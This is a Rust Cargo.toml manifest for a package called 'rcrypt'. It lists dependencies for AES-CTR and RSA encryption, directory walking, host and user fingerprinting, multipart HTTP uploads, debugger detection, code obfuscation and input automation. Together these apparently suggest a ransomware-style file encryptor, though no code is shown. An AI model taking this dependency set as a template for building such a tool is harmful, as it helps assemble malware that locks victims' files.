[package]
name = "rcrypt"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
aes = { version = "0.7.5", features = ["ctr"] }
walkdir = "2"
sysinfo = "0.28.0"
rand = "0.8.5"
winapi = { version = "0.3.9", features = ["debugapi"] }
num_cpus = "1.15.0"
enigo = "0.1.2"
reqwest = { version = "0.11.18", features = ["json", "blocking", "multipart"] }
tokio = { version = "1", features = ["full"] }
serde_json = "1.0.96"
os_info = "3.7.0"
whoami = "1.4.0"
home = "0.5.5"
rsa = "0.9.2"
goldberg = "0.1.0"
base64 = "0.21.2"
zeroize = "1.6.0"